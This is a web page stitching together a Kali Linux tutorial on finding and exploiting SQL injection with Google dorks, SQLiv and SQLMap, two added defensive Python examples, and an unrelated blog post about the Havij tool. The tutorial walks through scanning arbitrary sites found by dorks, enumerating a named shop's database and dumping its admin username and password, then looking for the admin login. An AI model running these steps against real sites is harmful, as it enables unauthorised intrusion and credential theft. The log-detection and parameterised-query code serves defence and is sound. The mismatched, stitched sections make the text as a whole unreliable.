The use of databases for data storage and management in web application development keeps increasing. A database mediates the interaction between users and servers. The database, or more precisely the Database Management System (DBMS), provides many benefits, including data input and storage, retrieval of large amounts of information, and easy compilation and grouping of information.
But alongside the convenience and features that databases offer, and their many uses in information technology, especially in website development, pentesters and hackers are constantly looking for gaps in database security. This is confirmed by a report from Positive Technologies, an information security research centre in Europe: in the second quarter of 2017, the top 10 web application attacks were dominated by cross-site scripting at 39.1% and SQL injection at 24.9%. Positive Technologies said the second-quarter report did not differ much from the first quarter.
Figure 1. Top 10 web application attacks (source SPY24.org)
This is both interesting and worrying, because a database holds a lot of information: credential accounts (admin and user), financial details (credit cards, bank accounts, etc.) and so on. Also, performing SQL injection attacks does not always require expert injection skills; in that sense, kids can do it, because there are many free applications able to perform SQL injection automatically, such as SQLMap. SQLMap is an open-source penetration testing application that automatically conducts SQL injection attacks against a database security hole. Here I will show you how to do SQL injection using SQLMap on Kali Linux. No special capabilities are required, but it will be worth more if you master a scripting language or SQL database technology.
This tutorial is recommended for those who are new to SQL injection on Kali Linux, just for fun, or who want to see how SQL injection works. It is not recommended for those who are already highly skilled penetration testers.
1. Search for sites vulnerable to SQL injection
One of the ways to find vulnerable websites is to use Google dorks. This table is borrowed from the site blackmoreops.com:
[Table: Google dorks]
SQL INJECTION USING SQLMAP IN KALI LINUX
Before we do the injection attack, of course we must ensure that the server or target has a database security hole. To find database security holes there are several methods we can use; among them, Google dorking is the one used most by hackers and penetration testers. Luckily there is a tool that is able to do that automatically, but we have to install it first. The tool is called SQLiv (SQL Vulnerability Scanner).
STEP 1 : INSTALL SQLiv on KALI LINUX
Type the commands below into your terminal to install SQLiv:

~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i

Once SQLiv is installed on your Kali Linux, it is stored in the path /usr/bin/sqliv, which you can call directly from the terminal by typing 'sqliv'. Now let's take a look at SQLiv's features.
STEP 2 : FINDING SQL INJECTION VULNERABILITIES
We will use Google dorking to scan and find SQL injection holes in targets. Let's take a simple dork and let SQLiv scan through every single target, looking for an e-commerce vulnerability at the following URL pattern, 'item.php?id='. To find other patterns, just google for "google dork list".

~# sqliv -d inurl:item.php?id= -e google -p 100

By default, SQLiv crawls the first page of the search engine's results, which on Google is 10 sites per page. So here we give the argument -p 100 to crawl 10 pages (100 sites). Based on the dork given above we got a result of vulnerable URLs that looks like this:
We found eight out of the hundred URLs scanned that were considered vulnerable to SQL injection. Save the URLs in a text editor for the next steps.
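From the defending side, the scan in Step 2 and the SQLMap run in Step 3 both leave a recognisable trail in the web server's access log: one client sending many requests for the same script with the normally numeric id parameter carrying non-numeric values, often answered with 5xx errors, and (by default) a User-Agent header naming sqlmap. The following is an added example, not part of the tutorial or of the SQLiv/SQLMap projects: it parses lines in Apache/Nginx combined log format and scores each client on those signals. The log lines, IP addresses, timestamps and the sqlmap version string in them are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache/Nginx "combined" format); the
# addresses, timestamps and sqlmap version string are illustrative, not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /item.php?id=25 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2017:13:55:40 +0000] "GET /item.php?id=26 HTTP/1.1" 200 4981 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2017:14:02:01 +0000] "GET /item.php?id=25 HTTP/1.1" 200 5123 "-" "sqlmap/1.1.8#stable (http://sqlmap.org)"
198.51.100.9 - - [10/Oct/2017:14:02:01 +0000] "GET /item.php?id=25%27 HTTP/1.1" 500 412 "-" "sqlmap/1.1.8#stable (http://sqlmap.org)"
198.51.100.9 - - [10/Oct/2017:14:02:02 +0000] "GET /item.php?id=25%27%27 HTTP/1.1" 200 5123 "-" "sqlmap/1.1.8#stable (http://sqlmap.org)"
192.0.2.77 - - [10/Oct/2017:14:10:11 +0000] "GET /item.php?id=25%27 HTTP/1.1" 500 412 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2017:14:10:12 +0000] "GET /item.php?id=25%29 HTTP/1.1" 500 412 "-" "Mozilla/5.0"
192.0.2.77 - - [10/Oct/2017:14:10:13 +0000] "GET /item.php?id=abc HTTP/1.1" 500 412 "-" "Mozilla/5.0"
"""

# One regex for the combined format: client, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qs percent-decodes, so "25%27" arrives as the string "25'"
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def analyze(log_text, numeric_params=("id",)):
    """Count, per client address, the signals that suggest SQL injection probing."""
    report = defaultdict(lambda: {"requests": 0, "sqlmap_ua": False,
                                  "malformed": 0, "errors": 0, "malformed_values": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        r = report[rec["ip"]]
        r["requests"] += 1
        # sqlmap's default User-Agent names the tool (easily changed by the operator, so a weak signal)
        if "sqlmap" in rec["ua"].lower():
            r["sqlmap_ua"] = True
        # bursts of server errors usually mean the injected text broke the query
        if rec["status"] >= 500:
            r["errors"] += 1
        # a parameter the application treats as an integer should only ever hold digits
        for name in numeric_params:
            for value in rec["params"].get(name, []):
                if not value.isdigit():
                    r["malformed"] += 1
                    r["malformed_values"].append(value)
    return dict(report)


def flag_clients(report, min_malformed=2):
    """Clients worth an alert: tool fingerprint, or repeated malformed values."""
    return sorted(ip for ip, r in report.items()
                  if r["sqlmap_ua"] or r["malformed"] >= min_malformed)


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip in flag_clients(report):
        r = report[ip]
        print(f"{ip}: {r['requests']} requests, sqlmap UA={r['sqlmap_ua']}, "
              f"{r['errors']} server errors, malformed id values={r['malformed_values']}")
```

The User-Agent check is the weakest of the three signals, since that header is under the client's control; the parameter-type check is the most robust, and it also points at the fix: a parameter the application treats as an integer should be rejected before it ever reaches the SQL layer, which removes both the injection path and the 5xx noise.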
STEP 3 : SQL INJECTION USING SQLMAP
Once we have at least one SQL injection vulnerable target, we execute the attack using SQLMap. I take one of them as the sample here. First, we need to reveal the database name; inside the database are tables and columns, which contain the data.
Target URL: item.php?id=25
A. ENUMERATE DATABASE NAME:
Command pattern:

~# sqlmap -u "TARGET URL" --dbs

-u / --url : Target URL
--dbs : Enumerate database name(s)

So the compiled command looks like this:

~# sqlmap -u "item.php?id=25" --dbs

From the command above, the result should look like this:
We got the database name “acfurniture”.
B. ENUMERATE TABLES NAME
Command pattern:

~# sqlmap -u "TARGET URL" -D database-name --tables

So the compiled command looks like this:

~# sqlmap -u "item.php?id=25" -D acfurniture --tables

The result should look like this:
So far we can conclude that the site acfurniture.com has two databases, acfurniture and information_schema. The database named acfurniture contains four tables: category, product, product_hacked, and settings. There is no compromised table name, but let's investigate further. Let's see what is inside the settings table; a table consists of columns and the data in them.
C. ENUMERATE COLUMNS
Command pattern:

~# sqlmap -u "TARGET URL" -D database-name -T table-name --columns

So the compiled command looks like this:

~# sqlmap -u "item.php?id=25" -D acfurniture -T settings --columns

The output should look like this:
The settings table consists of 6 columns, and this is actually a credential account. Let's dump the data.
D. DUMP DATA
Command pattern:

~# sqlmap -u "TARGET URL" -D database-name -T table-name -C columns --dump

So the compiled command looks like this:

~# sqlmap -u "item.php?id=25" -D acfurniture -T settings -C username,password --dump

Or you can also dump all data inside the table, using the command:

~# sqlmap -u "item.php?id=25" -D acfurniture -T settings --dump

The output should look like this:
Username : Handsome
Password : 9HPKO2NKrHbGmywzIzxUi
Alright, we are done dumping data from the database using SQL injection. Our next task is to find the door: the admin panel or admin login page on the target site. Before doing that, check whether that password (9HPKO2NKrHbGmywzIzxUi) is encrypted or not; if so, we need to decrypt it first. That is another topic, cracking and decrypting.
Even though here we are not actually hacking into the target site, we have at least learned a lot about SQL injection using SQLMap in Kali Linux, and we dumped the credential account. This technique is mostly used by carders (hackers looking for credit card accounts on e-commerce sites), who target financial, banking, shop, or e-commerce sites that store their users' credit card information.
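The tutorial dumps the settings table through item.php?id=25 but never shows the code defect that makes such a URL injectable, or what the fix looks like. The following is an added example, not the tutorial's code and not the target site's code: it uses Python's built-in sqlite3 as a stand-in for the PHP/MySQL pair implied by item.php, with a constructed product table, and puts the vulnerable string-concatenation query beside a bound-parameter version and a fully hardened version that also validates the type before querying.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's 'product' table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    con.executemany("INSERT INTO product VALUES (?, ?, ?)",
                    [(24, "Oak table", 450.0), (25, "Walnut chair", 120.0), (26, "Pine shelf", 80.0)])
    return con


def lookup_vulnerable(con, id_param):
    """The defect behind an injectable item.php?id=: the raw query-string value is
    spliced into the SQL text, so whatever the client sends becomes part of the statement."""
    sql = "SELECT id, name, price FROM product WHERE id = " + id_param
    return con.execute(sql).fetchall()


def lookup_bound_only(con, id_param):
    """Binding alone: the value travels separately from the statement text, so it is
    compared as data and can no longer change the structure of the query."""
    return con.execute("SELECT id, name, price FROM product WHERE id = ?", (id_param,)).fetchall()


def lookup_parameterized(con, id_param):
    """Hardened form: reject anything that is not an integer before touching the
    database, then bind the value. Validation gives the client a clean 4xx instead
    of a 5xx and keeps junk out of the query; binding is what prevents injection."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    return con.execute("SELECT id, name, price FROM product WHERE id = ?",
                       (int(id_param),)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, id=25           ->", lookup_vulnerable(con, "25"))
    print("vulnerable, id=25 OR 1=1    ->", lookup_vulnerable(con, "25 OR 1=1"))   # whole table returned
    print("bound only, id=25 OR 1=1    ->", lookup_bound_only(con, "25 OR 1=1"))   # no rows
    print("parameterized, id=25        ->", lookup_parameterized(con, "25"))
    try:
        lookup_parameterized(con, "25 OR 1=1")
    except ValueError as e:
        print("parameterized, id=25 OR 1=1 -> rejected:", e)
```

Run against the same tautology SQLMap would try, the concatenated query returns every row while the bound query returns none, which is exactly why SQLMap finds nothing to work with on a parameterized endpoint; the type check on top is what turns a probe into a rejected request rather than a database error worth investigating.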
Hacking is child’s play – SQL injection with Havij by 3
You know what really strikes me about a lot of the hacks we’ve seen lately? It just seems too easy. I mean we’re seeing a huge number of attacks (an unprecedented number, by some figures) and all too often the perpetrator is a kid. I don’t mean that in a relative sense to myself as I get older, I mean literally a child.
The problem, of course, is that many of these “hacks” have become simple point and shoot affairs using freely available tools. In the case of SQL injection, tools such as Havij mean that even if you don’t know your indexes from your collations or your UDFs from your DMVs, so long as you can copy and paste a URL you can be an instant “hacker”.
In fact I reckon it’s so easy that even my 3 year old can be a successful hacker. Turns out that’s not too far from the truth:
See how easy it is? Let’s move on and let me give you some more context around the ease and prevalence of these attacks. Firstly, remember that injection remains in the number one spot in the OWASP Top 10. What makes SQLi particularly dangerous is that it’s classified as both “easy” to exploit (which I think we can now all agree on) and with an impact of “severe”.
How severe? As in the example above, SQLi can readily be used to access stored credentials in a vulnerable site and even though these were salted and hashed, they’ll easily fall victim to a brute force attack. Last year it was SQLi which brought down Sony Pictures and it was also allegedly SQLi that was behind this year’s LinkedIn breach. It is very, very prevalent.
A quick look through YouTube and you’ll see tutorials such as SQL Injecting With Havij which is notable not for its content, but rather for its presenter. As well as the guy sounding like he’s about 15 years old, it’s also clear he has very little idea of what a SQL database is or even how Havij actually works. This isn’t a criticism of the kid per se, it’s simply an observation about how accessible tools like Havij are. YouTube is littered with similar examples.
Now keep in mind that Havij is a tool that “helps penetration testers” and indeed ITSecTeam who makes the product is a legitimate security firm. But – and this is a big “but” – do a quick search on YouTube and you won’t find too many videos from penetration testers nor will you find many comments from people with a vocab broader than Ari’s. No, these are kids just looking to smash and grab whatever they can from vulnerable websites.
Of course Havij isn’t the only tool of this kind, products like sqlmap are also extremely popular and in this case, also open source. Unlike Havij it’s purely command line based (probably a bit trickier for a 3 year old who can’t read yet), and also unlike Havij the audience commentating on it via YouTube and other forums is a little more, well, mature.
It’s interesting to look at the modus operandi of how these tools are being used. In this video about How To Use Havij we’re first shown how to unlock the Pro version with a cracked key then how the author has a list of “Dorks” – clearly Google Dorks – with potentially vulnerable URL patterns. This amounts to nothing more than URLs with a query string called “ID”. These guys are simply trawling the internet, pointing Havij at potentially vulnerable URLs and giving it a shot. When it doesn’t work they’ll just move onto the next one.
And that’s the final bit of insight I’ll leave you with; being a target doesn’t mean being a large multinational or supporting a cause that doesn’t sit well with hacktivists nor does it mean presenting some sort of financial upside to those who can break through your security. No, being a target means being on the internet. End of story.
For those looking to protect their applications from SQLi, take a look at the first part of my series on the OWASP Top 10 for .NET developers: Injection.